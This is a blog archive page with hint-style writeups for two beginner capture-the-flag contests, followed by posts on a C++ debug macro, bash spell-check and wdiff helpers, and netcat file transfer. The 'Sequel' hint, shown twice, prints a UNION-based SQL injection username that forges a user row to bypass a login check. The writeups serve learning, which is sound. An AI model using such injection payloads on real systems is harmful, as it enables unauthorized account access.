Ah! Year 2 of n00b ctf @ backdoor. Quite a nice and fun contest. Though this contest was for n00bs, I decided to take part again (just coz I won last time - find the writeup for those questions here). This time, I came second, since I couldn't solve 2 of the questions, and one other team (dcua) solved all except 1. However, a short while after the contest was done, I solved another. Now only the question titled EULA remains. Hopefully, I'll update this post with its writeup soon too :)
Here's a bunch of writeups (more like small hints) for each of the questions I solved:
Batman
Take a look at the URL as you click on the items. Maybe higher numbered items are interesting (even if they cannot be directly accessed). The Hackbar add-on for Firefox makes this very easy to go through, btw.
Bin-Easy
Okay, I didn't even run the binary. The answer was just lying there in one of the strings (hint hint) inside it directly. Pre-execution-analysis itself showed up the flag.
Bin-Medium
We can disassemble this executable and change the path of execution to either circumvent the check (through gdb) or by flipping one bit in the binary. Each of these would print the flag. Another thing is to try to work out how the flag is being made in the memory, but that's just wasting your time. Take the easy path :P
EULA
Still unsolved by me. However the Accept-Language HTTP parameter seems very interesting, especially with things like en, it etc.
Fool
A very high stake challenge (it had 150 points) but it a very short while, it was obvious it is a format string bug. After that it is trivial to attack it (read up on FSBs if it isn't). I made a stupid mistake though which took a couple of minutes to realize. I was sending a single quote at the beginning and at the end. Doh!
Frost
A multi byte xor cipher. My favourite tool for this (xortool.py) works directly.
Magic
The = at the end gives away that it is base64 encoded. Decoding it gives another cipher but the spacing makes it obvious that it must be some simple ancient cipher. Caesar would be proud.
Matrix
I couldn't solve this challenge during the contest, but solved it just after it, and damn, was I over thinking it. During the contest, I realized that the gs were too regular (every 7th place) so I split it into 32 lines of 6 characters each (after removing the gs at the end of each line). All these were hex digits, and with the 6 character thing, I naturally thought of colours (for example, #00ff00 is green). Lot of time was wasted in this direction, but after the contest and a small hint of transposing the matrix (i.e. making it into 6 rows of 32 characters each), it was obvious that each of those could be hashes. Online MD5 crackers then gave away the answers.
Rbash
Restricted bash - where cd wasn't allowed. Well, ls -l .. worked. And there was the flag right there to be cated to the screen. Later on, I found out that you could also execute shell inside this rbash and then you could do anything you wanted!
Robot
The name of this challenge gave away that we needed to look at robots.txt (that pesky little file that web crawlers are supposed to adhere to, but only lead to attackers finding things they shouldn't).
Wahtzdis
Whoa! That is a lot of data, but seems like the javascript console in the browser nicely handles it. Turns out this is the esoteric language JSFuck.
Did you find any other cool/new ways of solving any of these tasks? If so, leave a comment below.
Showing posts with label terminal. Show all posts
Showing posts with label terminal. Show all posts
Wednesday, 13 January 2016
Monday, 5 January 2015
Writeup for n00b15CTF
This is a collection of hints for all the problems in the recently conducted Capture The Flag (CTF) contest conducted by SDSLabs as a way to get n00bs (beginners) to have a taste of the beautiful world of hacking. It was a pretty fun contest even though it was quite easy.
Use a SHA256 tool. My favourite is to just search for "SHA256 STRING_TO_BE_SHA256" on my default search engine (www.duckduckgo.com)
There is a redirect occuring here from http://hack.bckdr.in/LOCATION-51/index.html to http://hack.bckdr.in/LOCATION-51/trap.html Stop this redirect, and read the source of index.html The javascript there gives away the flag
Using the file linux command, we find out that it is an ELF binary, but running it gives nothing. However, running strings on it gives away the flag.
The zip file contains a .txt file which does not seem normal text, so we run a file on it. This says that it is jpeg, so change it to .jpg and open it. It is a QR code. Decode this using some online tool (just search for "QR code decode online" for a large number of free tools) and get a link. The link has the flag.
The message says Console, so open up console in Firefox. The message then tells you to POST data to a link. Going to this link directly does nothing, but sending it any random POST data (using HackBar addon in Firefox for example) gives the flag.
Analyzing the file with IDA Pro shows that there is a function called print_flags() which is not called inside main(). Running this function should print the flag. We can do this by attaching gdb to the binary, breaking the execution and running the print_flags() function.
Extracting the file and analyzing with Wireshark shows that there is too much to work with. But exporting all the files and then running strings on it would probably work. However, filtering this is a pain, so I just ran a grep for flag and the answer will be visible near a pastebin title.
Use GIMP or Photoshop to add the images. The flag should be obvious then.
Slow down and reverse the sound wave using Audacity. Listen to it and it should be obvious what the flag is.
Looking at the code, it seems like a SQL injection can be done here. Downloading the database.sdb file and rewriting the source code to start throwing data from database, you realize that there is no user sdslabs in the database. This makes it obvious that you need to add the user. The following username virtually that: ' UNION SELECT 'sdslabs','sdslabs','sdslabs','sdslabs','0c4ea8f5b344600f78516334254e9e085f2225a42a0bb18fa8bd774589f1ca19' UNION SELECT * FROM users WHERE '0'='1. Note that this query will not work directly, the password will have to be set accordingly.
The file is a ext4 filesystem (use file command if you don't trust the extension). Mount this in linux using the mount command (read man mount to know how) and then open the file inside to see the flag.
Did you find any other cool/new ways of solving any of these tasks? If so, leave a comment below.
Link to writeup for n00b16ctf
Test
Use a SHA256 tool. My favourite is to just search for "SHA256 STRING_TO_BE_SHA256" on my default search engine (www.duckduckgo.com)
Location-51
There is a redirect occuring here from http://hack.bckdr.in/LOCATION-51/index.html to http://hack.bckdr.in/LOCATION-51/trap.html Stop this redirect, and read the source of index.html The javascript there gives away the flag
Hidden flag - Easy
Using the file linux command, we find out that it is an ELF binary, but running it gives nothing. However, running strings on it gives away the flag.
Search
The zip file contains a .txt file which does not seem normal text, so we run a file on it. This says that it is jpeg, so change it to .jpg and open it. It is a QR code. Decode this using some online tool (just search for "QR code decode online" for a large number of free tools) and get a link. The link has the flag.
Lost
The message says Console, so open up console in Firefox. The message then tells you to POST data to a link. Going to this link directly does nothing, but sending it any random POST data (using HackBar addon in Firefox for example) gives the flag.
Hidden flag - Medium
Analyzing the file with IDA Pro shows that there is a function called print_flags() which is not called inside main(). Running this function should print the flag. We can do this by attaching gdb to the binary, breaking the execution and running the print_flags() function.
Clutter
Extracting the file and analyzing with Wireshark shows that there is too much to work with. But exporting all the files and then running strings on it would probably work. However, filtering this is a pain, so I just ran a grep for flag and the answer will be visible near a pastebin title.
No - Signal
Use GIMP or Photoshop to add the images. The flag should be obvious then.
Sound
Slow down and reverse the sound wave using Audacity. Listen to it and it should be obvious what the flag is.
Sequel
Looking at the code, it seems like a SQL injection can be done here. Downloading the database.sdb file and rewriting the source code to start throwing data from database, you realize that there is no user sdslabs in the database. This makes it obvious that you need to add the user. The following username virtually that: ' UNION SELECT 'sdslabs','sdslabs','sdslabs','sdslabs','0c4ea8f5b344600f78516334254e9e085f2225a42a0bb18fa8bd774589f1ca19' UNION SELECT * FROM users WHERE '0'='1. Note that this query will not work directly, the password will have to be set accordingly.
Undisputed
The file is a ext4 filesystem (use file command if you don't trust the extension). Mount this in linux using the mount command (read man mount to know how) and then open the file inside to see the flag.
Did you find any other cool/new ways of solving any of these tasks? If so, leave a comment below.
Link to writeup for n00b16ctf
Wednesday, 26 November 2014
Debugging code in a competitive setting, Part 1
Writing code in a competitive setting is an especially tiring and frustrating task, for a multitude of reasons. The rush of wanting to code fast prevents one from applying good coding standards and leads to trivial errors. Also, there is no time to set up a testing framework etc. How do you prevent (or at least find and correct) any errors in the code you write?
What I personally do is to use a combination of gdb and a custom debug message function.
The first part of this series of posts will explain the function
First, I always put the following code at the start of my programs:
#ifdef DEBUGIT
#define DEBUG(X) cerr << ">>> DEBUG(" << __LINE__ << ") " << #X << " = " << X << endl
#else
#define DEBUG(X) (void)0
#endif
Now, whenever there is a need to check the value of a variable (or expression), all that is left to be done is to call the DEBUG() function like so:
DEBUG(x); // debugging variable x
DEBUG((a<<3)+2); // debugging an expression
The way that the "function" (or macro, to be precise) is defined, whenever DEBUGIT is defined at compilation, debug statements are shown, and otherwise, they are just skipped.
Hence, whenever you want to look at the debug statements, use g++ -DDEBUGIT to compile instead of just g++.
Here's an example program and its output:
#include <iostream>
using namespace std;
#ifdef DEBUGIT
#define DEBUG(X) cerr << ">>> DEBUG(" << __LINE__ << ") " << #X << " = " << X << endl
#else
#define DEBUG(X) (void)0
#endif
int main() {
int x = 5, y = 10;
DEBUG(x);
DEBUG(y);
++x += y++;
DEBUG(y+1);
cout << x << endl;
}
Output:
>>> DEBUG(13) x = 5
>>> DEBUG(14) y = 10
>>> DEBUG(16) y+1 = 12
16
The advantage with the DEBUGIT technique is that you can directly submit code (without any modifications) and the grader will not run the DEBUG statements at all.
I have added the following line to my .bashrc file:
alias d++='g++ -DDEBUGIT'
Hence, I can directly run d++ for compiling with the debug statements.
In my next post, I will explain how to use gdb to further make life easier.
Monday, 24 November 2014
Terminal based Spell Check
Here's a cool little script I wrote (added to my .bashrc) file in order to test spellings, or to generate them when I don't remember them.
The script is run quite simply by saying "spelling word-to-be-checked". For example,
Where this is extremely useful is when you cannot remember some part of the spelling of a word. For example allitaration or alliteration. Here, I can just use a regex.
Running
function spelling {
if [ $((`grep -c "^$1$" /usr/share/dict/american-english`)) -gt 0 ]; then
echo -e "Spelling of\e[1;32m" `grep -m 1 "^$1$" \
/usr/share/dict/american-english` "\e[0mseems fine"
else
echo -e "\e[1;31mThere seems to be a mistake in spelling\e[0m"
fi
}
The script is run quite simply by saying "spelling word-to-be-checked". For example,
spelling lookwould say
Spelling of look seems fine
butspelling loukwould say
There seems to be a mistake in spelling
Where this is extremely useful is when you cannot remember some part of the spelling of a word. For example allitaration or alliteration. Here, I can just use a regex.
Running
spelling allit.rationwould say
Spelling of alliteration seems fine
thereby giving the right spelling.
Wednesday, 22 October 2014
The Easiest Way Ever to Compare 2 Texts
Here's another reason to use Linux: You can use the beautiful terminal tool called wdiff (more useful when only certain words in a sentence may have changed, as opposed to whole sentences or code, in which case, diff is a better tool)
How do you use it? First, you'll have to install it (simple standard "
sudo apt-get install wdiff" is enough - HA! Let's see Windows install anything that easily!)
Then, just use this crazy little command whenever you need to compare two documents:
echo "Enter text1 (press Enter,Ctrl+D when done):"; cat > /tmp/1.txt; echo "Enter text2 (press Enter,Ctrl+D when done):"; cat > /tmp/2.txt; echo "Comparing..."; wdiff -n -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' -s /tmp/1.txt /tmp/2.txt; rm /tmp/1.txt; rm /tmp/2.txt
Or, let's just make our lives easier and put all of that into a function (therefore, making it more nicely written and easier to understand too)
function 2compare {
echo "Enter text1 (press Enter,Ctrl+D when done):"
cat > /tmp/1.txt
echo "Enter text2 (press Enter,Ctrl+D when done):"
cat > /tmp/2.txt
echo "Comparing..."
wdiff -n -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' -s /tmp/1.txt /tmp/2.txt
rm /tmp/1.txt
rm /tmp/2.txt
}
Now, all you have to do is call 2compare and you will be able to compare texts.
Well, let's break it down, shall we?
The echo parts just show useful messages on the screen.
The cat parts store the data taken as input into temporary locations /tmp/1.txt and /tmp/2.txt
The wdiff part is the scariest bit but is quite simple (as we shall see):
But what if you don't want to keep rewriting that crazy long function each time you restart your terminal?
You can place it at the end of ~/.bashrc and then you'll be able to use 2compare directly from your terminal next time onwards.
This command is staying in my ~/.bashrc probably permanently from now on. Maybe I'll post some other useful stuff I have in there in later blog posts.
Do you know of any other ways of comparing files? Any new terminal tricks?
Leave your comments below.
How do you use it? First, you'll have to install it (simple standard "
sudo apt-get install wdiff" is enough - HA! Let's see Windows install anything that easily!)
Then, just use this crazy little command whenever you need to compare two documents:
echo "Enter text1 (press Enter,Ctrl+D when done):"; cat > /tmp/1.txt; echo "Enter text2 (press Enter,Ctrl+D when done):"; cat > /tmp/2.txt; echo "Comparing..."; wdiff -n -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' -s /tmp/1.txt /tmp/2.txt; rm /tmp/1.txt; rm /tmp/2.txt
Or, let's just make our lives easier and put all of that into a function (therefore, making it more nicely written and easier to understand too)
function 2compare {
echo "Enter text1 (press Enter,Ctrl+D when done):"
cat > /tmp/1.txt
echo "Enter text2 (press Enter,Ctrl+D when done):"
cat > /tmp/2.txt
echo "Comparing..."
wdiff -n -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' -s /tmp/1.txt /tmp/2.txt
rm /tmp/1.txt
rm /tmp/2.txt
}
Now, all you have to do is call 2compare and you will be able to compare texts.
Well, let's break it down, shall we?
The echo parts just show useful messages on the screen.
The cat parts store the data taken as input into temporary locations /tmp/1.txt and /tmp/2.txt
The wdiff part is the scariest bit but is quite simple (as we shall see):
- -n is a short way of saying --avoid-wraps which means "do not extend fields through newlines"
- -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' sets up colours to show the differences in a much more easy to see way. wdiff by default shows colourless output (and shows differences using brackets etc.)
- -s or --statistics causes wdiff to show how many words were added, deleted etc.
- /tmp/1.txt /tmp/2.txt just specifies the files to be compared
But what if you don't want to keep rewriting that crazy long function each time you restart your terminal?
You can place it at the end of ~/.bashrc and then you'll be able to use 2compare directly from your terminal next time onwards.
This command is staying in my ~/.bashrc probably permanently from now on. Maybe I'll post some other useful stuff I have in there in later blog posts.
Do you know of any other ways of comparing files? Any new terminal tricks?
Leave your comments below.
Sunday, 28 September 2014
Reaching the network's speed limit for file transfer
Are you tired of transferring files from one computer to another using pen-drives and their abysmally slow speeds? Ever long for something faster? Here's a nice way to transfer files insanely fast - as fast as the network would allow (Note: This is another cool reason to switch to Linux)
Here's what you do:
Let's say you want to send a folder called ABC from computer X to computer Y. Then, fire up terminal on computer Y first and type the following commands:
"hostname -I" shows all IP addresses associated with the host Y. You'll need to note these down to be used on computer X. "nc" is a utility that allows for arbitrary TCP and UDP connections and listens. "-l 9898" is a flag for nc to open port 9898 and listen for connections. The "|" pipes the output of nc (i.e. whatever comes from the network) into the next command "tar" which is an archival utility. The "xv" part stands for extract verbose which means that the archive coming from nc is extracted and each file name is printed out as it is extracted.
Once you're done running the above command on Y, run the following command on X:
The "tar c" part stands for "use tar to compress" ABC (the folder to be sent). IP is the IP address got from the "hostname -I" command on computer Y. "nc IP 9898" connects to computer Y on port 9898 and sends the data from the tar command to the other computer.
Since no extra data is transferred in this way, the data should be transferred at the maximum (theoretical) limit of your network. If your network is unstable, this might actually cause a problem since no error correction codes are sent; however, if your network is stable (or all you are sending is movies or the like) then it shouldn't matter much.
Do you know of any other fast ways to transfer data on the network? Leave a comment below. :)
Here's what you do:
Let's say you want to send a folder called ABC from computer X to computer Y. Then, fire up terminal on computer Y first and type the following commands:
hostname -I nc -l 9898 | tar xv
"hostname -I" shows all IP addresses associated with the host Y. You'll need to note these down to be used on computer X. "nc" is a utility that allows for arbitrary TCP and UDP connections and listens. "-l 9898" is a flag for nc to open port 9898 and listen for connections. The "|" pipes the output of nc (i.e. whatever comes from the network) into the next command "tar" which is an archival utility. The "xv" part stands for extract verbose which means that the archive coming from nc is extracted and each file name is printed out as it is extracted.
Once you're done running the above command on Y, run the following command on X:
tar c ABC | nc IP 9898
The "tar c" part stands for "use tar to compress" ABC (the folder to be sent). IP is the IP address got from the "hostname -I" command on computer Y. "nc IP 9898" connects to computer Y on port 9898 and sends the data from the tar command to the other computer.
Since no extra data is transferred in this way, the data should be transferred at the maximum (theoretical) limit of your network. If your network is unstable, this might actually cause a problem since no error correction codes are sent; however, if your network is stable (or all you are sending is movies or the like) then it shouldn't matter much.
Do you know of any other fast ways to transfer data on the network? Leave a comment below. :)
Subscribe to:
Posts (Atom)